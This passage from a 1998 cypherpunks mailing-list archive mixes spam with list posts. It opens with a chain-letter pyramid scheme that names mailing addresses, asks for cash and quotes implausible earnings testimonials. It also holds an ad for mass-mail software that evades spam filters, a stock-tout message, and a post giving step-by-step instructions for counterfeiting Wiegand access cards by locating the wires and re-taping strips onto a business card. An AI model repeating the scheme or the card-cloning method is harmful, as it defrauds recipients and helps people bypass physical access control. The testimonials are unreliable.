of all,
you never have to leave the house, except to get the mail and go to the 
bank!
 
 This truly is that lucky break you've been waiting for!  Simply follow
the easy instructions in this letter, and your financial dreams will 
come
true!  When followed correctly, this electronic, multi-level marketing 
program
works.
 
 Thousands of people have used this program to:
 
 -Raise capital to start their own business
 -Pay off debts
 -Buy homes, cars, etc.,
 -Even retire!
 
 This is your chance, so don't pass it up!
 
 ____________________________________________________________
 OVERVIEW OF THIS EXTRAORDINARY ELECTRONIC MULTI-LEVEL MARKETING PROGRAM
 ____________________________________________________________
 
 Basically, this is what we do:
 
 We send thousands of people a product for $5.00 that costs next to
nothing to produce and e-mail.  As with all multi-level businesses, we 
build our 
 business by recruiting new partners and selling our products.  Every
state in  the U.S. allows you to recruit new multi-level business online 
(via your 
 computer).
 
 The products in this program are a series of four business and 
financial 
 reports costing $5.00 each.  Each order you receive via "snail mail" 
will

 include:
 
 *$5.00 cash
 *The name and number of the report they are ordering
 *The e-mail address where you will e-mail them the report they ordered.  
 
 To fill each order, you simply e-mail the product to the buyer. 
 The $5.00 is yours!
 
 This is the EASIEST electronic multi-level marketing business anywhere!
 
 FOLLOW THE INSTRUCTIONS TO THE LETTER AND BE PREPARED TO REAP THE
STAGGERING BENEFITS!!!!
 
 ********INSTRUCTIONS**********
 
 This is what you MUST do:
 
 1.  Order all 4 reports shown on the list below (you can't sell them if
you 
 don't order them).
 
      *For each report, send $5.00 CASH, the NAME & NUMBER OF THE 
 REPORT YOU ARE ORDERING, YOUR E-MAIL ADDRESS, AND YOUR RETURN POSTAL
ADDRESS 
 (in case of a problem) to the person whose name appears on the list 
next
to the report.  
 
      * When you place your order, make sure you order each of the four 
 reports.  You will need all four reports so that you can save them on 
 your computer and resell them.  
 
      * Within a few days you will receive, via e-mail, each of the four 
 reports.  Save them on your computer so they will be accessible for you
to 
 send to the 1,000's of people who will order them from you.
 
 2.  IMPORTANT--DO NOT alter the names of the people who are listed next
to each  report, or their sequence on the list, in any way other than is 
 instructed below in steps "a" through "d" or you will lose out on the 
 majority of your profits.  Once you understand the way this works, 
you'll
 also see how it doesn't work if you change it.  Remember, this method 
has
 been tested, and if you alter it, it will not work.  This is just the 
nature of the program. In order to achieve the multiplying phenomenon 
you must follow the steps.
 
    a.  Look below for the listing of available reports.
 
    b.  After you've ordered the four reports, replace the name and
address  under REPORT #1 with your name and address, moving the one that 
was there
down  to REPORT #2.
 
    c.  Move the name and address that was under REPORT #2 down to
REPORT#3.
 
    d.  Move the name and address that was under REPORT #3 down to 
REPORT
#4.
 
    e.  The name and address that was under REPORT #4 is removed from 
the
list  and has NO DOUBT collected their 50 grand.  
 
 
 Please make sure you copy everyone's name and address ACCURATELY!!!
 
 3.  Take this entire letter, including the modified list of names, and
save  it to your computer.  Make NO changes to the instruction portion 
of this 
 letter.  
 
 4.  Now you're ready to start an advertising campaign on the WORLDWIDE
WEB!  
 Advertising on the WEB is very, very inexpensive, and there are 
HUNDREDS
of FREE places to advertise.  Another avenue which you could use for 
advertising
is e-mail lists.  You can buy these lists for under $20/2,000 addresses 
or you can
pay someone a minimal charge to take care of it for you.  
 
BE SURE TO START YOUR AD CAMPAIGN IMMEDIATELY!
 
 5.  For every $5.00 you receive, all you must do is e-mail them the
report  they ordered.  THAT'S IT!  ALWAYS PROVIDE SAME-DAY SERVICE ON 
ALL ORDERS!
 This guarantees  the e-mail THEY send out, with YOUR name and address 
on
it, will be prompt because they can't advertise until they receive the 
report!
 
 ___________________________
 AVAILABLE REPORTS
 ___________________________  
 
 ***Order Each REPORT by NUMBER and NAME***
 
 Notes:
 - ALWAYS SEND $5 CASH FOR EACH REPORT
 - ALWAYS SEND YOUR ORDER VIA FIRST CLASS MAIL
 - Make sure the cash is concealed by wrapping it in at least two sheets
of  paper.
 - On one of those sheets of paper, include: (a) the number and name of
the report you are ordering, (b) your e-mail address, and (c) your 
postal 
 address.
 
 __________________________________________________________  
 
 REPORT #1  "How to Start Your Own Home Based Business For Fun & 
Profit!"
 
 ORDER REPORT #1 FROM:
 
KKyKo
Rideau Town Center
Post Office Box 30029
Kingston, ON
Canada
K7K 7B5

Please ensure sufficient postage, it is slightly more to mail to Canada. 
If you like I can include how I collected over 4000 email addresses for 
free and I'll include the list I compiled. Simply add five dollars to 
this order.
 
 _____________________________________________________________
 
 REPORT #2 "An Insiders Handbook on U.S. Government Auction Sales"
 
 ORDER REPORT #2 FROM:
 
 U.S. Champs
 Post Office Box 1612
 Hermitage, PA  16148
 
 _____________________________________________________________
 
 REPORT #3 "How To Make Money Without Leaving Your House!"
 
 ORDER REPORT #3 FROM:
 
Caines
 3622 Tiffany Lane
 West Middlesex, PA  16159
 _____________________________________________________________
 
 REPORT #4 "Earn Extra Money With a Home Based Answering Machine"
 
 ORDER REPORT #4 FROM:
 
 Timberlane Consultants
 2627 Romar Drive
 Hermitage, PA  16148

 
 _____________________________________________________________
 


 
 HERE'S HOW THIS AMAZING PLAN WILL MAKE YOU $MONEY$
 
 _____________________________________________________________
 
 
 Let's say you decide to start small just to see how well it works. 
Assume your goal is to get 10 people to participate on your first level. 
(Placing a  lot of FREE ads on the Internet will EASILY get a larger 
response.)  Also
 assume that everyone else in YOUR ORGANIZATION gets ONLY 10 downline
members. 
 
 Follow this example to achieve the STAGGERING results below.  
 
 1st level--your 10 members with
 $5..................................$50
 
 2nd level--10 members from those 10 ($5 x100)..................$500
 3rd level--10 members from those 100 ($5 x 1,000)..............$5,000
 4th level--10 members from those 1,000 ($5 x 10,000)...........$50,000
 
                                        THIS TOTALS
 
 ----------------->$55,550
 
 Remember friends, this assumes that the people who participate only
recruit  10 people each.  Think for a moment what would happen if they 
got 20
people  to participate!  Most people get 100's of participants!  THINK 
ABOUT
IT!!!!!
 
 Your cost to participate in this is practically nothing (surely you can 
 afford $20 for a chance to make $55,000).  You obviously already have 
an 
 Internet connection and e-mail is FREE!!!  REPORT #3 shows you the most 
 productive methods for bulk e-mailing and purchasing e-mail lists.  
Some
list  and bulk e-mail vendors even work on trade!  
 
 About 50,000 new people get online every month!
 
 ********TIPS FOR SUCCESS*********
 
 *TREAT THIS AS YOUR BUSINESS!  Be prompt, professional, and follow the 
 directions accurately.  
 
 *Send for the four reports IMMEDIATELY so you will have them when the
orders start coming in because:
 
      When you receive a $5 order, you MUST send out the requested 
 product/report to comply with the U.S. Postal & Lottery Laws, Title 18, 
 Sections 1302 and 1341 or Title 18, Section 3005 in the U.S. Code, also
Code  of Federal Regs.  Vol. 16, Sections 255 and 436, which state that 
"a
product  or service must be exchanged for money received".
 
 *ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.
 
 *Be patient and persistant with this program.  If you follow the
instructions  exactly, the results WILL undoubtedly be SUCCESSFUL!
 
 *ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED!
 
 
 ************YOUR SUCCESS GUIDELINE******************
 
 Follow these guidelines to guarantee your success:
 
 If you don't receive 10 to 20 orders for REPORT #1 within two weeks,
continue  advertising until you do.  Then, a couple of weeks later you 
should
receive at least 100 orders for REPORT #2.  If you don't, continue 
advertising until
you  do.  Once you have received 100 or more orders for REPORT #2, YOU 
CAN
RELAX,  because the system is already working for you, and the cash will 
continue
to  roll in!
 
 THIS IS IMPORTANT TO REMEMBER:
 
 Every time your name is moved down on the list, you are placed in front
of a  DIFFERENT report.  You can KEEP TRACK of your PROGRESS by watching 
which
report people are ordering from you.  If you want to generate more 
income, send
another batch of e-mails and start the whole process again!  There is no 
limit to
the income you will generate from this business!!
 
 NOTE:  If you need help with starting a business, registering a 
business 
 name, how income tax is handled, etc., contact your local office of the
Small  Business Administration (a Federal agency) for free help and 
answers to 
 questions.  Also, the Internal Revenue Service offers free help via
telephone  and free seminars about business taxes.  
 
 
 *******TESTIMONIALS*******
 
 	This program does work, but you must follow it EXACTLY!  Especially 
the
rule  of not trying to place your name in a different position, it won't 
work
and you'll  lose a lot of potential income.  I'm living proof that it 
works.  It
really is a great opportunity to make relatively easy money, with little 
cost to
you.   If you do choose to participate, follow the program exactly, and 
 you'll be on your way to financial security.  
      
Sean McLaughlin, Jackson, MS
 
 	My name is Frank.  My wife, Doris, and I live in Bel-Air, MD.  I am a
cost accountant  with a major U.S. Corporation and I make pretty good 
money.  When I
received the program I grumbled to Doris about receiving "junk mail".  I 
made fun
of the whole thing, spouting my knowledge of the population and 
 percentages involved.  I "knew" it wouldn't work.  Doris totally 
ignored
my supposed intelligence and jumped in with both feet.  I made merciless 
fun
of  her, and was ready to lay the old "I told you so" on her when the 
thing
didn't  work....Well, the laugh was on me!  Within two weeks she had 
received
over 50 responses.  Within 45 days she had received over $147,200 in $5 
bills!  I
was  shocked!  I was sure that I had it all figured out and that it 
wouldn't
work.  I AM a believer now.  I have joined Doris in her "hobby".  I did 
have
seven more years until retirement, but I think of the "rat race" and 
it's not
for me.  We owe it all to MLM.  
      Frank T., Bel-Air, MD
 
 	I just want to pass along my best wishes and encouragement to you.  
Any
doubts  you have will vanish when your first orders come in.  I even 
checked with
the  U.S. Post Office to verify that the plan was legal.  It definitely 
 is!   IT WORKS!!!!!
      Paul Johnson, Raleigh, NC
 
 	The main reason for this letter is to convince you that this system is 
 honest, lawful, extremely profitable, and is a way to get a large sum 
of
money  in a short time.  I was approached several times before I checked 
this
out.   I joined just to see what one could expect in return for the 
minimal
effort and  money required.  To my astonishment, I received $36,470.00 
in the first
14 weeks,  with money still coming in.
      Sincerely yours, Phillip A. Brown, Esq.
 
 	Not being the gambling type, it took me several weeks to make up my 
mind
to  participate in this plan.  But conservative that I am, I decided 
that the
initial  investment was so little that there was just no way I wouldn't 
get 
 enough orders to at least get my money back.  Boy, was I surprised when 
I
 found my medium-size post office box crammed with orders!  For awhile, 
it
got  so overloaded that I had to start picking up my mail at the window.  
I'll
make more money this year than in any 10 years of my life before.  The
nice  thing about this deal is that it doesn't matter where in the U.S. 
the
people  live.  There simply isn't a better investment with a faster 
return.
      Mary Rockland, Lansing, MI
 
 	I had received this program before.  I deleted it, but later I 
wondered
if I  shouldn't have given it a try.  Of course, I had no idea who to 
contact
to get another copy, so I had to wait until I was e-mailed another 
program. 
11 months passed then it came...I didn't delete this one!...I made more 
than
 $41,000 on the first try!!
      Wilburn, Muncie, IN
 
	This is my third time to participate in this plan.  We have quit our
jobs, and  will soon buy a home on the beach and live off the interest 
on our money.
The only way on earth that this plan will work for you is if you do it.  
For 
 your sake, and for your family's sake don't pass up this golden
opportunity.  Good luck and happy spending!  
      Charles Fairchild, Spokane, WA
 
     
 NOW WHAT IS $20 FOR A CHANCE TO MAKE AN EXCESS OF $50,000?  ORDER YOUR
REPORTS  TODAY AND GET STARTED ON YOUR ROAD TO FINANCIAL FREEDOM!!!!!!
 



______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: huihienii21@msn.com
Date: Mon, 25 May 1998 16:34:38 -0700 (PDT)
To: huihienii21@msn.com
Subject: Want to Advertise? Bulk Friendly Hosting? We Have It!!
Message-ID: <1998051434NAA13714@AOL-SUCKS.upm.edu.my>
MIME-Version: 1.0
Content-Type: text/plain


                              Express Mail Server & MORE!!!   

The Next Genereration in Mass Emailers, Completely bypass your ISP's email server and send out your email     
originating from your personal computer directly into your recipients mail system! Send email directly from you computer without using any of your ISP's server resources!     
    
Mail is delivered instantaneously,  This incredible mail engine actually hand delivers the message from     
your computer into the recipients mail system. No delay; message literally travels right to its destination.     
    
Guaranteed delivery Every single last one of your messages gets delivered!  Message goes     
directly from your computer to your recipients mail system.       
    
Personalize messages, Automatically inserts recipients name in the  body or your letter for a     
dramatic increase in responses.  Verifies every single addresses before sending.  Puts all bad addresses in a bad address file  (practically eliminates     
undeliverables!).     
    
Unbelievably FAST !!  This new technology uses a multithreaded process to connect directly     
with your recipients mail system!  Express Mail will send up to 80,000 messages per hour with a 28.8     
modem (even faster with ISDN and T-1) and every single message will be individually placed in your     
recipients mail system instantaneously!     
    
Randomizing option allows you to break through any filters.  This is a necessity to get mail through to AOL members.  Create your messages in the built-in word processor.  It has everything you need including spell check and color!  Customization feature allows you to personally create your  program.  This will single-handedly generate additional sales for you and your     
clients.  You'll love this feature!     
    
                                  REQUIREMENTS
     
                              Windows 95 or higher     
                                   8 MB RAM     
                             486 or faster processor     
                       10 MB free space on your hard drive     

    
                             **SPECIAL** ONLY $150.00**
                     Call 1-800-298-7863 To Order Your Demo Today!!                                            


       Recieve 250,000 email addresses & Stealth Mass Mailer for free!!(With Purchase)

                               OTHER MAIL PROGRAMS

         Fresh 20 Million + Email Addresses on CD for only $90.00
    Get 3 Stealth Mass Mailers with unlock codes for only $150.00
                       We also have Gold Rush for only $300.00
                        Email Adressee Extractor for $100.00
                               Caller ID for $100.00
                         Bulk Mate List Manager for $129.00
                           Desk Top Server 98 for $339.00
                                   MX Lookup for $185.00
                                           MUCH MORE

         Bulk Friendly Web Hosting On Foreign Backbone only $90.00 a month, Sex site Hosting, only $350.00 a month, 2 page Bulk Friendly web hosting only $60.00 month

     Also, call about a great rate of 8.9 cents long distance, even with 800/888 numbers!!  
            14.9 cents a minute calling cards(not prepaid) EARN MONEY TOO!!!

800 voice mail with unlimited calls, only $45.00 a month!!!!!

   Please leave information on the item that you are calling about. Thank you.  
    
Need to advertise a product or service? We can do it for you!! If you are already paying someone to do it, then call us and I bet we can beat them. Our fees usually start at $395.00 for 1.2 million, we even have lower rates.


    
    WE CAN ALSO ADVERTISE YOUR PRODUCTS OR SERVICES!!!!
PLEASE CALL US FOR RATES ON THIS!!!!! EXCELLANT RATES!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 26 May 1998 06:58:49 -0700 (PDT)
To: jim.moran@mail.house.gov
Subject: Appeals court notices
Message-ID: <356AC83A.747B@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Monday 5/26/98 7:39 AM

John Young

I looked at http://www.jya.com/nsa-cases.htm

 CALIFORNIA NORTHERN DISTRICT COURT
   Gilmore          v. NSA               
   Bernstein        v. State 

U.S. COURT OF APPEALS, NINTH CIRCUIT 
  Gilmore          v. NSA               [Court denied access to docket]  
  Bernstein        v. USA, et al        09/10/97  12/08/97  Open:
Submitted         

Looks like Gilmore http://www.cygnus.com/~gnu/ is on his way to the
Supreme Court.  Too.

We must all keep in mind that the government has loaded the courts with
its own
judges.

I was told not to worry if I got caught doing illegal work breaking
electronic
locks for the FBI.  The courts would cover for me.

Not enough people took seriously what some were saying during the
Vietnam
war.  Looks like those who screamed "Fascist pigs", unfortunately, were
right.

 FASCISM -   a political and economic movement, strongly nationalistic,
magnifying the rights
  of the state as opposed to those of the individual, in which industry,
though  remaining largely 
  under private ownership, and all administrative political units,  are
controlled by a strong central     
  government.

This morning I will file some papers for Morales with the court.

And get forms for notice of appeal to the Tenth circuit.

Let's all hope its not too late to make some PEACEFUL changes.  And hope
for settlement too.

Later
bill


Counterfeiting Wiegand Wire Access Credentials
     
                                   Bill Payne
     
                                 October 16,1996
     
                                    Abstract
     
                  Wiegand wire access credentials are easy and
                  inexpensive to counterfeit.
     
        Access Control & Security Systems Integration magazine, October
        1996 [http://www/securitysolutions.com] published the article,
     
             Wiegand technology stands the test of time
     
             by PAUL J. BODELL, page 12
     
             Many card and reader manufacturers offer Wiegand (pronounced
             wee-gand) output.  However, only three companies in the
             world make Wiegand readers.  Sensor Engineering of Hamden
             Conn., holds the patent for Wiegand, and Sensor has licensed
             Cardkey of Simi Valley, Calif., and Doduco of Pforzheim,
             Germany, to manufacture Wiegand cards and readers. ...  A
             Wiegand output reader is not the same thing as a Wiegand
             reader,  and it is important to understand the differences.
     
                In brief, Wiegand reader use the Wiegand effect to
             translate card information around the patented Wiegand
             effect in which a segment of a specially treated wire
             generates an electronic pulse when subjected to a specific
             magnetic field.  If the pulse is generated when the wire is
             near a pick-up coil, the pulse can be detected by a circuit.
             Lining up several rows of wires and passing them by a cold
             would generate a series of pulses.  Lining up two rows of
             wires - calling on row "zero bits" and the other "one bits"
             - and passing them by two different coils would generate two
             series of pulses, or data bits.  These data bits can then be
             interpreted as binary data and used to control other
             devices.  If you seal the coils in a rugged housing with
             properly placed magnets, and LED and some simple circuitry,
             you have a Wiegand reader.  Carefully laminate the special
             wires in vinyl, and artwork, and hot-stamp a number on the
             vinyl, and you have a Wiegand card.
     
             IN THE BEGINNING
     
               Wiegand was first to introduce to the access control
             market in the late 1970s.  It was immediately successful
             because it filled the need for durable, secure card and
             reader technology.
               Embedded in the cards, Wiegand wires cannot be altered or
             duplicated. ...
     
        Bodell's Last statement is incorrect.
     
        Tasks for EASILY counterfeiting Wiegand wire cards are
     
        1    Locate the wires inside the card to read the 0s and 1s.
     
        2    Build an ACCEPTABLE copy of the card.
     
        Bodell's clear explanation of the working of a Wiegand card can
        be visualized
     
             zero row    |     |   |
     
             one row        |          |
     
             binary      0  1  0   0   1
             representation
     
        Solutions to Task 1
     
             A    X-ray the card
     
             B    MAGNI VIEW FILM,  Mylar film reads magnetic fields ...
                  Edmunds Scientific Company, catalog 16N1, page
                  205, C33,447  $11.75
     
        is placed over the top of the Wiegand card.
     
        COW MAGNET,  Cow magnetics allow farmers to trap metal in the
        stomachs of their cows.  Edmunds, page 204, C31,101 $10.75
        is placed under the card.
     
        Location of the wires is easily seen on the green film.
     
        Mark the position of the wires with a pen.
     
        Next chop the card vertically using a shear into about 80/1000s
        paper-match-sized strips.
     
        Don't worry about cutting a wire or two.
     
        Note that a 0 has the pen mark to the top.  A 1 has the pen mark
        at the bottom.
     
        Take a business card and layout the "paper match"-like strips to
        counterfeit the card number desired.
     
        Don't worry about spacing.  Wiegand output is self-clocking!
     
        Tape the "paper-match - like" strips to the business card.
     
        Only the FUNCTION of the card needs to be reproduced!
     
                                     History
     
        Breaking electronic locks was done as "work for others" at Sandia
     
        National Laboratories beginning in 1992 funded by the Federal
        Bureau of Investigation/Engineering Research Facility, Quantico,
        VA.
     
        The FBI opined that this work was SECRET/NATIONAL SECURITY
        INFORMATION.
     
        Details of the consequences of this work are covered in
     
             Fired Worker File Lawsuit Against Sandia
             Specialist Says He Balked When Lab Sought Electronic
             Picklock Software, Albuquer Journal, Sunday April 25, 1993
     
             State-sanctioned paranoia,  EE Times, January 22, 1996
     
             One man's battle,  EE Times, March 22, 1994
     
             Damn the torpedoes,  EE Times, June 6, 1994
     
             Protecting properly classified info,  EE Times, April 11,
             1994
     
             DOE to scrutinize fairness in old whistle-blower cases,
             Albuquerque Tribune, Nov 7 1995
     
             DOE boss accelerates whistle-blower protection,  Albuquerque
             Tribune, March 27, 1996
     
             DOE doesn't plan to compensate 'old' whistle-blowers with
             money, Albuquerque Tribune September 27, 199




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xena - Warrior Princess <xena@best.com>
Date: Tue, 26 May 1998 11:30:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Holograms
Message-ID: <Pine.BSF.3.96.980526112916.24296A-100000@shell16.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



EURO HOLOGRAM IS MISSING
Somewhere between Paris and Munich, a unique hologram design, intended to
deter counterfeiting of the new euro currency, has turned up missing.  The
French-made hologram was on its way to a high-security printer near
Nuremberg for testing.  One European Union monetary official called the
disappearance "startling" and there's speculation that the EU may have to
change the design of its high-denomination euro banknotes, due to be issued
in 2002.  The hologram was designed by a small business in Paris and was
taken to be loaded onto an Air France flight at Roissy airport by Brink's
security services.  Officials in Paris say the theft bears the hallmarks of
a well-organized crime, as only an expert would understand the significance
of the hologram in the note-printing process.  (Financial Times 21 May 98)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trans World Specials" <twaweb@inet2.twa.com>
Date: Tue, 26 May 1998 11:12:53 -0700 (PDT)
To: Trans World Airlines Customers <twaweb@inet2.twa.com>
Subject: Trans World Specials Fare Sales
Message-ID: <19980526153826.19097.qmail@inet2.twa.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Trans World Specials 
 for May 26th, 1998.  Fares are 
 valid for travel originating 
 5/30/98 and returning 6/1/98 or
 6/2/98.  All tickets must be 
 purchased May 29th. 
 
 Have you been to www.twa.com
 lately?  Enroll in Aviators or
 check your mileage portfolio online.
 Read about TWA's J.D. Power &
 Associates / Frequent Flyer 
 Magazine Long Haul service award.
 
 On to this week's Trans World Specials
 
 
 ***********COACH FARES************
 
 
 
 Roundtrip fares betweeen ST. LOUIS, MO and:
 
 
 Cedar Rapids, IA (CID) 		$79
 Detroit, MI (DTW)		$89
 Wichita, KS (ICT)		$89
 Colorado Springs, CO (COS)	$139
 Boston, MA (BOS)		$149
 
 
 
 Roundtrip fares between BOSTON, MA and:
 
 
 Cedar Rapids, IA (CID)		$149
 Little Rock, AR (LIT)		$149
 St. Louis, MO (STL)		$149
 Wichita, KS (ICT)		$149
 Colorado Springs, CO (COS)	$169
 
 
 Roundtrip fares between CEDAR RAPIDS, IA and:
 
 
 St. Louis, MO (STL) 		$79
 Detroit, MI (DTW)		$99
 Boston, MA (BOS)		$149
 
 
 Travel is not valid on Trans World
 Express flights 7000-7999.  
 
 Call TWA at 1-800-221-2000 and book your 
 your Trans World Special today. 
 
 
 *******GETAWAY VACATIONS************
 
 
 ORLANDO -- Econo Lodge Maingate Hawaiian includes:
 
 - roundtrip economy airfare
 - 2 nights hotel accommodations
 - airport transfers
 - Avis 4-door compact car rental
 - 2 for 1 Church Street Station admission
 - kids 12 and under eat FREE
 - just 1.5 miles to Walt Disney World main entrance
 - 2000 bonus Aviator Miles in addition to actual miles
 - from $239 departing New York (JFK)
 - from $245 departing St. Louis
 - from $255 departing Cincinnati, Columbus, Dayton
   Detroit, Indianapolis, Kansas City, Litte Rock,
   Milwaukee, Nashville, Oklahoma City, Omaha
 - from $299 departing Boston, Hartford, Philadelphia
   Pittsburgh
 
 
 
 TASTE OF EUROPE FROM $2139 includes:
 
 - roundtrip economy airfare
 - buffet breakfast daily
 - sightseeing
 - some dinners
 - travel by private luxury motorcoach
 - available for 8/20/98 departure 
 - available from Los Angeles, San Francisco, Seattle
 - FIRST CLASS upgrade option for only $1099 each way
 - 5000 bonus Aviator Miles in addition to actual miles
 
 
 Call 1-800-GETAWAY( 438-2929) now
 and book your GETAWAY VACATION. 
 
 ******************ALAMO**************
 
 
 ALAMO offers these low rates for an 
 economy car valid 5/30/98 - 6/1/98
 
 $17.99		Detroit, St. Louis
 
 $20.99		Boston, Little Rock
 
 $29.99		Colorado Springs
 
 For reservations call Alamo at 1-800-GO-ALAMO and 
 request rate code RT and ID # 443833. For online
 reservations access Alamo at 
 http://www.goalamo.com
 
 ***********HILTON HOTELS & RESORTS*****
 
 Hilton Hotels/Resorts offers this low rate 
 valid the nights of 5/30/98 - 6/1/98
 
 $67	Detroit Metro Airport Hilton Suites, Romulus, MI 
 	( explore the many shopping malls or 
 	 the Windsor Casino)
 
 For reservations call Hilton at 1-800-774-1500 and
 ask for Hilton Value Rates. Visit Hilton at
 http://www.hilton.com
 
 
 **********TERMS & CONDITIONS**************
 
 
 Airfare Terms and Conditions: 
 GENERAL CONDITIONS: Fares shown are round trip, nonrefundable and 
 are subject to change. Changes to itinerary are not permitted. Fares 
 do not include Passenger Facility Charges of up to $12 depending 
 on itinerary. Must use E-Ticketing for domestic travel. Credit card 
 is the only form of payment accepted. Offer is not available in 
 conjunction with any other  discount, coupon or promotional offer. 
 Seats are limited and may not be available on all flights or days 
 of the week. Tickets must be purchased at time of booking and no 
 later than 5/29/98. Standby passengers not allowed.  DOM
 Monday (6/1) or Tuesday (6/2). Travel is effective 5/30/98 with 
 all travel to be completed by 6/2/98. Minimum stay is 2 days. 
 Maximum stay is 3 days. 
 
 Getaway Conditions: 
 ALL PACKAGES: Package include round-trip economy airfare from 
 cities indicated. Price is per person based on double occupancy
 and is subject to change. Availability, restrictions, surcharges,
 blackouts and cancellation penalties apply. No other discounts
 or promotions are valid in conjunction with these packages.  
 DOMESTIC CONDITIONS: Depart for Orlando Sunday-Wednesday and 
 return Tuesday-Friday. Travel is valid 6/23/98-7/29/98 with all 
 travel completed 7/31/98. Surcharges apply 7/12-7/31. Price 
 does not include Passenger Facility Charges of up to $16 per 
 person. Full payment due by 6/1/98. 
 INTERNATIONAL CONDITIONS: Seats are limited and may not be 
 available on all flights. Price does not include Passenger 
 Facility Charges, US departure/arrival, agriculture, and 
 security fees from point of origin of travel up to approximately
 $90 per person. Single supplement from $489. Full payment is
 required by 6/1/98. 
 
 Car Rental Conditions: 
 Taxes (including in California, VLF taxes ranging up to $1.89 per day),
 registrations fee/tax reimbursement, and airport access fees/taxes, 
 if any, are extra. Optional CDW, liability insurance, fuel, additional
 driver fee, drop charges and other optional items are extra. Rates higher
 for renters under age 25. Rates valid for rentals commencing on Saturday
 and ending by 11:59 PM on Tuesday. Rates only valid during week in which
 they are published via TWA Internet site. A 24-hour advance reservation
 is required. Availability is limited.  
 
 Hotel Conditions: 
 Hilton Hotels and Resorts special rates are available only during the
 specific week in which they are published via the TWA Hot Deals 
 Internet site and the HiltonNet Internet site. Limited availability;
 rooms at these Hilton Value Rates are sold on a first-come, first-served
 basis. Availability, rate, and terms of occupancy are not guaranteed 
 and will be confirmed at time of reservation. Participating hotels,
 rates and terms are subject to change without notice. Single or double
 occupancy. Early check-in, late check-out subject to availability. 
 No extra charge for children when they stay in parents' or grandparents'
 room; total room occupancy subject to local fire safety regulations and
 other applicable laws or regulations. Rates vary by season, do not 
 include any other fees or charges, including without limitation state or
 local taxes or gratuities and are subject to change without notice. 
 Advance booking required. Advance deposit may be required. Offer cannot
 be combined with any other special discounts, coupons, certificates, 
 special rates, promotional offers, award stays, or meeting/group stays. 
 Hilton reserves the right to cancel any Hilton Value Rate at any time 
 without notice. Hilton is not responsible for the terms of other offers
 in the program, or for any electronic, computer, telephone, security, virus
 or any other problem or damage related to use of the program or its offers. 
 
 
 For reservations call 1-800-221-2000 (domestic) or 1-800-892-4141 (international) 
 or call your travel agent and ask for TWA's special Internet fares. 
 
 
 
 
 
 
 
 
 
 
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bulletingmarket3893@ub.net.id
Date: Wed, 27 May 1998 04:56:46 -0700 (PDT)
To: marketbulletin@ub.net.id
Subject: SUBJECT: RE:  MARKET BULLETIN!!
Message-ID: <148785261852.OAA03652@mailrout4.ub.net.id>
MIME-Version: 1.0
Content-Type: text/plain


The celebrated Stanley Morgan StockMarket Newsletter
projects new highs in all the major U.S. market indices. (Asia
crisis=U.S. slowdown=lower interest rates=higher stock prices.)

Our top stock selections include:

Cisco Systems     CSCO     76

Excite            XCIT     53

Mark I Inds.      MKII      1 1/8

We anticipate EXPLOSIVE upside movement in the above
group. http://quote.yahoo.com/

Send no money, sample issue: Dept. WIN, P.O. Box 30499, Seven Mile
Beach, Grand Cayman, B.W.I.           















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 26 May 1998 21:43:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Structure of MISTY
Message-ID: <199805270443.GAA18680@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



http://www.mitsubishi.com/ghp_japan/misty/200misty.htm

        





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan <jdobruck@kki.net.pl>
Date: Wed, 27 May 1998 02:50:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: PGP v6.0 & OpenPGP
Message-ID: <356BE23C.EB31683A@kki.net.pl>
MIME-Version: 1.0
Content-Type: text/plain


Greetings.

I've heard these two are going to come out one day soon.
What I'm interested in is what's so new in it that it's being called
version 6.0... Thanks in advance.

And my second message is about my archive. The reason why it hadn't
been updated to something worthwhile is the fact that i need to
spell-check the archives i download. There are tons of errors in them.
It's 
just too bad that people don't spell check their own documents on the
net.

Sincerely,
Jan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Atkinson, Comm-Eng" <jmatk@tscm.com>
Date: Wed, 27 May 1998 16:34:30 -0700 (PDT)
To: FraudAlert@tscm.com
Subject: Fraud Alert - Frank Jones - Spyking
Message-ID: <v03110703b1923781c474@[205.161.57.127]>
MIME-Version: 1.0
Content-Type: text/plain



Greetings,

I regret to inform you that you may have been the victim of a serious hoax
foisted by Frank Jones (aka: SpyKing).

Many people, including the members of the media, have been swallowing what
Frank Jones has to offer, simply because they neither understand the
science or won't do even simple research on a vendor (hint: the TEMPEST,
DATASCAN and similar products are an utter hoax).

You may be interested in the following information regarding Frank Jones
which we have listed on the Threat Profile Library.

	http://www.tscm.com/FNJspyking.html


We would encourage you to examine the materials in the Threat Profile
Library, and then to review your own dealings with the subject.

We also recommend that you carefully review the documents, and then contact
those agencies directly yourself (they would be happy to talk to you).

Each of the agencies (such as NY PI Lisc. Board, and NY Police Department)
will gladly provide you with authentication of the documents we present and
will gladly send you copies of the original documents (just ask them). They
will verify the documents are indeed genuine and were generated by their
agencies. Of course Frank claims that all of the documents in the library
have been forged and are counterfit (which is a hilarious claim).

Please feel free to verify the documents, in fact we strongly encourage it!!!

You may seriously want to reconsider your attendance at SpookTec98 as
several of the victims (and "Guest Speakers") who attended last year were
not at all amused (some of whom where burned when their promised "limo and
free hotel room" never showed up).

Good Luck,

-jma


 =======================================================================
          Everybody's into computers... Who's into yours?
 =======================================================================
  James M. Atkinson                             Phone: (978) 546-3803
  Granite Island Group - TSCM.COM
  127 Eastern Avenue #291                        http://www.tscm.com/
  Gloucester, MA 01931                          mailto:jmatk@tscm.com
 =======================================================================
  The First, The Largest, The Most Popular, and The Most Complete TSCM,
